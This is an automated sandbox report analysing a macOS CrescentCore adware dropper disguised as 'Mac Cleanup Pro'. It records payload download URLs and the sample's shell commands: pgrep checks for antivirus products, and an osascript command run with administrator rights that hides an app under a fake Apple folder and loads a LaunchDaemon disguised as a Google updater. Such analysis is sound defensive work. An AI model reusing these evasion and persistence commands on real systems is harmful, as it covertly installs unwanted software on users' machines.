Play interactive tour

Edit tour

Analysis Report 7UCvOfE6UM

Overview

General Information

Joe Sandbox Version:	26.0.0 Aquamarine
Analysis ID:	79020
Start date:	01.07.2019
Start time:	11:04:04
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 14m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	7UCvOfE6UM (renamed file extension from none to dmg)
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:	MAL
Classification:	mal80.adwa.spyw.evad.macDMG@0/889@12/0
Warnings:	Show All Excluded IPs from analysis (whitelisted): 172.217.16.206, 23.10.249.152, 23.10.249.171, 23.10.249.146, 23.10.249.168, 17.253.57.207, 17.253.55.211, 172.217.21.202, 216.58.205.234, 172.217.21.234, 172.217.22.10, 172.217.18.170, 172.217.23.138, 216.58.207.42, 172.217.16.170, 172.217.16.138, 172.217.22.74, 172.217.22.106, 216.58.210.10, 172.217.18.106, 216.58.206.10, 172.217.18.99, 216.58.210.4 Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, gstaticadssl.l.google.com, fonts.googleapis.com, www-google-analytics.l.google.com, ajax.googleapis.com, fonts.gstatic.com, a279.dscq.akamai.net, googleapis.l.google.com, ocsp.int-x3.letsencrypt.org.edgesuite.net, a771.dscq.akamai.net, googleadapis.l.google.com, mesu.g.aaplimg.com, isrg.trustid.ocsp.identrust.com, www.google.com, mesu.apple.com, isrg.trustid.ocsp.identrust.com.edgesuite.net, www.google-analytics.com Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	80	0 - 100	Report FP / FN	false

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	AppleScript3	Hidden Files and Directories1	Launch Daemon3	Hidden Files and Directories1	Credential Dumping	Security Software Discovery1	AppleScript3	Data from Local System	Data Encrypted1	Standard Cryptographic Protocol1
Replication Through Removable Media	Scripting2	Launch Agent4	Accessibility Features	Scripting2	Network Sniffing	System Information Discovery441	Remote File Copy4	Data from Removable Media	Exfiltration Over Other Network Medium	Remote File Copy4
Drive-by Compromise	User Execution1	Launch Daemon3	Path Interception	File Deletion1	Input Capture	Query Registry	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol5
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Code Signing1	Credentials in Files	System Network Configuration Discovery	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol5

Signature Overview

Click to jump to signature section

Cryptography:

Writes files containing public keys to disk

Show sources

Source: /bin/cp (PID: 806)

File created 'PUBLIC KEY' pattern: /Applications/Mac Cleanup Pro.app/Contents/Resources/dsa_pub.pem

Jump to dropped file

Networking:

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.55.202
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.55.202

Downloads compressed data via HTTP

Show sources

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:51 GMTAccept-Ranges: bytesETag: "806980c821d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 4891Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 3d 6b 8f db b6 96 df 0b f4 3f 68 6f 11 a4 09 2c 8f de f6 4c b1 01 32 33 c9 26 40 33 cd e6 81 7e 58 2c 02 5a a2 6d 6d 64 49 57 92 e3 99 16 f7 bf 2f 29 89 14 9f 7a d8 4e 6e 6e 71 a3 b6 41 65 e9 f0 f0 bc cf e1 21 b5 ca a2 07 e3 cf 1f 7f 30 d0 9f 75 96 56 e6 1a ec e2 e4 e1 ca 78 fc 5b 0e 53 a3 04 69 f9 78 56 ff 65 96 b0 88 d7 bf 34 8f e6 20 8a e2 74 73 65 58 f9 7d 7b 6b 07 8a 4d 9c b2 77 c2 2c c9 8a 2b e3 27 db c1 17 ba f9 8f 1f 7f f8 f1 87 6d b5 4b 66 06 3b ee 16 c6 9b 6d 75 65 d8 96 f5 c8 f8 8f 78 97 67 45 05 d2 8a bc b0 ce 8a 9d ea 51 f2 3b 20 3f 92 f1 2c cb b1 c3 80 fc 3c 2f f3 38 84 05 9d 64 92 01 04 20 81 eb aa 45 f3 10 47 d5 96 82 e4 66 e7 a0 c9 b4 13 6a 60 15 d9 c1 4c 33 b3 7d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:26 GMTAccept-Ranges: bytesETag: "0b799b921d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 19147Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 5d b3 e3 b8 b1 20 f8 be bf 42 b7 3a 3a ba ca 25 a9 28 ea eb 48 8a 3e e3 bb 9e 89 b9 8e 18 df 97 f1 c3 44 b4 6b 37 28 91 3a a2 8b 12 65 92 aa 0f 6b 35 bf 7d f1 4d 20 91 09 52 aa d3 6d 4f 84 5d 61 5b 07 99 48 24 12 09 64 32 01 24 3e fc ee df fe af c1 ef 06 ff 77 59 36 75 53 25 e7 c1 e7 e9 78 3a 9e 0d de 1e 9a e6 bc fe f0 e1 25 6b b6 1a 36 de 95 c7 77 1c fb 0f e5 f9 5b 95 bf 1c 9a 41 1c 4d 26 23 f6 3f f3 c1 9f bf e4 4d 93 55 c3 c1 1f 4f bb 31 47 fa 1f f9 2e 3b d5 59 3a b8 9c d2 ac 1a fc e9 8f 7f 96 44 6b 4e 35 6f 0e 97 2d a7 f7 a1 f9 b2 ad 3f 98 26 3e 6c 8b 72 fb e1 98 d4 8c d4 87 ff f1 c7 3f fc b7 ff fc 9f ff 8d 37 f9 81 f1 39 38 95 d5 31 29 f2 bf 67 e3 5d 5d 73 46 a3 71 3c f8 ff
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:29 GMTAccept-Ranges: bytesETag: "807a63bb21d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 1035Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ac 57 7b 6b e3 46 10 ff bb 81 7c 87 29 25 90 83 4a 27 c9 96 a5 c8 70 b4 a6 94 1e b4 d7 52 f2 05 d6 d6 5a 5a 22 ed 0a 69 9d f3 9d c9 77 ef 3e 6d 3d d6 3e e7 9a 17 36 9e f7 cc 6f 7e 1e c1 2f 35 ce 09 82 6e d3 62 4c 01 d1 1c ee 6b 42 bd 1c 3f 93 0d f6 3e 93 9c 97 59 f8 10 05 cd fe 9d 91 a2 fd 50 1a 07 89 92 1e 6e 6f fc 0d a3 1c 11 8a 5b 6f 5b ed 48 0e 07 90 ea 5a 0f b4 9b 25 bc dc de 88 bf db 9b 37 8e 4d ea e2 f1 33 13 21 d7 68 f3 54 b4 6c 47 f3 0c 7e da 06 f2 17 76 6d 75 ef fb ef 49 8d 0a dc bd ff 58 17 5e e4 37 b4 78 07 94 79 2d 6e 30 e2 30 0b ee 20 8e 65 82 27 07 5e 47 be e2 6c 91 88 8f 01 ed 38 5b 82 4c b0 c4 a4 28 79 36 8f 6d 39 2a 76 29 aa 18 45 9f 46 9d b9 a2 86 69 f0 7d 61 b7 64

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /mcp/builds/mcp_mcpcnsppi.dmg HTTP/1.1Host: cdn.macclean-pro.comAccept-Language: en-CH;q=1.0, de-CH;q=0.9Accept: /Connection: keep-aliveAccept-Encoding: gzip;q=1.0, compress;q=0.5User-Agent: Player/1.7 (com.l.r.l.m; build:3; OS X 10.13.2) Alamofire/4.8.1
Source: global traffic	HTTP traffic detected: GET /ProductPrice.svc/GetCountryCode HTTP/1.1Host: cc.ppacti.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /ProductPrice.svc/GetCountryCode HTTP/1.1Host: cc.ppacti.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /ProductPrice.svc/PaddlePlanPrice/ch/91 HTTP/1.1Host: cc.ppacti.comContent-Type: application/jsonConnection: keep-aliveAccept: application/jsonUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Content-Length: 0Accept-Language: en-usAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mcp/update/mcp.xml HTTP/1.1Host: cdn.maccleanuppro.comAccept: application/rss+xml,/;q=0.1Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac Cleanup Pro/4.1.0 Sparkle/1.18.1
Source: global traffic	HTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: helpermcp/1.0 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /mcp/prefs/mcpWebSets.plist HTTP/1.1Host: cdn.maccleanuppro.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: helpermcp/1.0 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: /Cookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1 HTTP/1.1Host: in.getadvancedmac.comUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /css/designer.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,/;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /css/bootstrap.min.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,/;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /css/styleResponsive.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,/;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: in.getadvancedmac.comAccept: /Connection: keep-aliveCookie: __utma=265934551.201815749.1561979134.1561979134.1561979134.1; __utmb=265934551.1.10.1561979134; __utmc=265934551; __utmt=1; __utmz=265934551.1561979134.1.1.utmcsr=mcpcnsppi\|utmccn=mcpcnsppi\|utmcmd=mcpcnsppi; ASP.NET_SessionId=vgwea11otp4gobhswgwbfk42; mmPRECKE=mmPRECKE0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0 HTTP/1.1Host: www.getadvancedmac.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Upgrade-Insecure-Requests: 1Cookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.getadvancedmac.comAccept: /Connection: keep-aliveCookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://www.getadvancedmac.com/mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0Accept-Encoding: gzip, deflate

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: px-storage.com

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:40 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c

Urls found in memory or binary data

Show sources

Source: helpermcp.377.dr	String found in binary or memory: http://bgtc.macautofixer.com/maf/more/isr/mafrplcamc.zip
Source: helpermcp.377.dr	String found in binary or memory: http://bgtc.macautofixer.com/maf/more/isr/mafrplcamc.zipreplaceMTNAppAfterDownload:Mac
Source: Info.plist1.377.dr	String found in binary or memory: http://cdn.maccleanuppro.com/mcp/update/mcp.xml
Source: helpermcp.377.dr	String found in binary or memory: http://cdn.mymacutils.com/amc/more/silupd/advancedmaccleaner.zip
Source: helpermcp.377.dr	String found in binary or memory: http://cdn.mymacutils.com/amc/more/silupd/advancedmaccleaner.zipEtt$Bkvga$Uqmp
Source: Alamofire0.317.dr	String found in binary or memory: http://crl.apple.com/root.crl0
Source: Autoupdate.377.dr	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: jquery.min.js0.377.dr	String found in binary or memory: http://docs.jquery.com/License
Source: helpermcp.log.405.dr	String found in binary or memory: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0
Source: jquery.min.js0.377.dr	String found in binary or memory: http://jquery.com/
Source: helpermcp.log.405.dr	String found in binary or memory: http://maccleanpro.esecureshoppe.com/mcp/plan?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lp
Source: Autoupdate.377.dr	String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: Alamofire0.317.dr	String found in binary or memory: http://ocsp.apple.com/ocsp-wwdr010
Source: Alamofire	String found in binary or memory: http://ocsp.apple.com/ocsp03-devid060
Source: jquery.min.js0.377.dr	String found in binary or memory: http://sizzlejs.com/
Source: helpermcp.log.405.dr	String found in binary or memory: http://uin.getadvancedmac.com/uninstall/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpi
Source: .dat.nosync02ed.9K4WCN.265.dr	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: Alamofire0.317.dr	String found in binary or memory: http://www.apple.com/appleca/0
Source: Autoupdate.377.dr	String found in binary or memory: http://www.apple.com/appleca0
Source: Alamofire	String found in binary or memory: http://www.apple.com/certificateauthority/0
Source: helpermcp.log.405.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpc
Source: helpermcp.log.405.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackUpdate&x-base=&utm_term=&utm_content=&utm_source=mcp
Source: helpermcp.377.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersAccepted&pxl=
Source: helpermcp.377.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersAccepted&pxl=IOPlatformExpertDeviceIOPlatfo
Source: helpermcp.377.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersView&pxl=
Source: helpermcp.377.dr	String found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersView&pxl=wvh
Source: InAppPurchage.html.377.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: CFNetworkDownload_X8jW0f.tmp.265.dr	String found in binary or memory: https://api.crashlytics.com/spi/v1/platforms/mac/apps/com.l.r.l.m
Source: CFNetworkDownload_X8jW0f.tmp.265.dr	String found in binary or memory: https://api.crashlytics.com/spi/v2/platforms/mac/apps/com.l.r.l.m/beta_update_check
Source: CFNetworkDownload_X8jW0f.tmp.265.dr	String found in binary or memory: https://e.crashlytics.com/spi/v2/events
Source: InAppPurchage.html.377.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:100
Source: CFNetworkDownload_X8jW0f.tmp.265.dr	String found in binary or memory: https://reports.crashlytics.com/sdk-api/v1/platforms/android/apps/com.l.r.l.m/minidumps
Source: CFNetworkDownload_X8jW0f.tmp.265.dr	String found in binary or memory: https://reports.crashlytics.com/spi/v1/platforms/mac/apps/com.l.r.l.m/reports
Source: Alamofire0.317.dr	String found in binary or memory: https://www.apple.com/appleca/0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49469
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49468
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49489
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49464
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49471
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49470
Source: unknown	Network traffic detected: HTTP traffic on port 49464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49491
Source: unknown	Network traffic detected: HTTP traffic on port 49468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49469 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49489 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49471 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49491 -> 443

Spam, unwanted Advertisements and Ransom Demands:

Detected macOS CrescentCore

Show sources

Source: /bin/mkdir (PID: 783)

IOC directory created: /Library/Application Support/com.apple.spotlight.Core

Jump to behavior

Writes HTML files containing JavaScript to disk

Show sources

Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/after_scan_nag.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/cta_clean.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/exit_nag.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/Discount_Popup.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/error_popup.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/openapp_popup.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/uninstall.htm	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/InAppPurchage.html	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/InAppPurchage_three.html	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/prm_nag.html	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/thnkyou.html	Jump to dropped file
Source: /bin/cp (PID: 806)	HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/thnkyoureg.html	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/Discount_Popup.htm	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/error_popup.htm	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/openapp_popup.htm	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/uninstall.htm	Jump to dropped file

System Summary:

Malicious sample detected (through custom Yara rule)

Show sources

Source: Alamofire, type: SAMPLE	Matched rule: Detects macOS CrescentCore
Source: Player, type: SAMPLE	Matched rule: Detects macOS CrescentCore

Classification label

Show sources

Source: classification engine

Classification label: mal80.adwa.spyw.evad.macDMG@0/889@12/0

Data Obfuscation:

Imports the IOKit library (often used to register services)

Show sources

Source: initial sample

Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

Attaches disk images with shell command 'hdiutil'

Show sources

Source: /bin/sh (PID: 796)

Hdiutil command executed: hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmg

Jump to behavior

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Show sources

Source: /bin/sh (PID: 751)	Shell process: hdiutil info	Jump to behavior
Source: /bin/sh (PID: 752)	Shell process: grep -e image-path	Jump to behavior
Source: /bin/sh (PID: 754)	Shell process: pgrep -f -i bitdefender	Jump to behavior
Source: /bin/sh (PID: 755)	Shell process: pgrep -f -i intego	Jump to behavior
Source: /bin/sh (PID: 756)	Shell process: pgrep -f -i kaspersky	Jump to behavior
Source: /bin/sh (PID: 757)	Shell process: pgrep -f -i norton	Jump to behavior
Source: /bin/sh (PID: 758)	Shell process: pgrep -f -i trend micro	Jump to behavior
Source: /bin/sh (PID: 759)	Shell process: pgrep -f -i clamxav	Jump to behavior
Source: /bin/sh (PID: 760)	Shell process: pgrep -f -i eset	Jump to behavior
Source: /bin/sh (PID: 761)	Shell process: pgrep -f -i f-secure	Jump to behavior
Source: /bin/sh (PID: 762)	Shell process: pgrep -f -i avast	Jump to behavior
Source: /bin/sh (PID: 763)	Shell process: pgrep -f -i avira	Jump to behavior
Source: /bin/sh (PID: 764)	Shell process: pgrep -f -i malwarebytes	Jump to behavior
Source: /bin/sh (PID: 765)	Shell process: pgrep -f -i sophos	Jump to behavior
Source: /bin/sh (PID: 766)	Shell process: pgrep -f -i zap	Jump to behavior
Source: /bin/sh (PID: 767)	Shell process: pgrep -f -i total av	Jump to behavior
Source: /bin/sh (PID: 768)	Shell process: pgrep -f -i bullguard	Jump to behavior
Source: /bin/sh (PID: 769)	Shell process: pgrep -f -i panda	Jump to behavior
Source: /bin/sh (PID: 770)	Shell process: pgrep -f -i avg	Jump to behavior
Source: /bin/sh (PID: 771)	Shell process: pgrep -f -i webroot	Jump to behavior
Source: /bin/sh (PID: 773)	Shell process: ioreg -l	Jump to behavior
Source: /bin/sh (PID: 774)	Shell process: grep -e Manufacturer	Jump to behavior
Source: /bin/sh (PID: 775)	Shell process: mkdir /tmp/ddd	Jump to behavior
Source: /bin/sh (PID: 776)	Shell process: unzip -o /tmp/Updater.zip -d /tmp/ddd	Jump to behavior
Source: /bin/sh (PID: 777)	Shell process: rm -rf /tmp/Updater.zip	Jump to behavior
Source: /bin/sh (PID: 778)	Shell process: osascript -e do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privileges	Jump to behavior
Source: /bin/sh (PID: 783)	Shell process: mkdir /Library/Application Support/com.apple.spotlight.Core	Jump to behavior
Source: /bin/sh (PID: 784)	Shell process: mv /tmp/ddd/Updater.app /Library/Application Support/com.apple.spotlight.Core	Jump to behavior
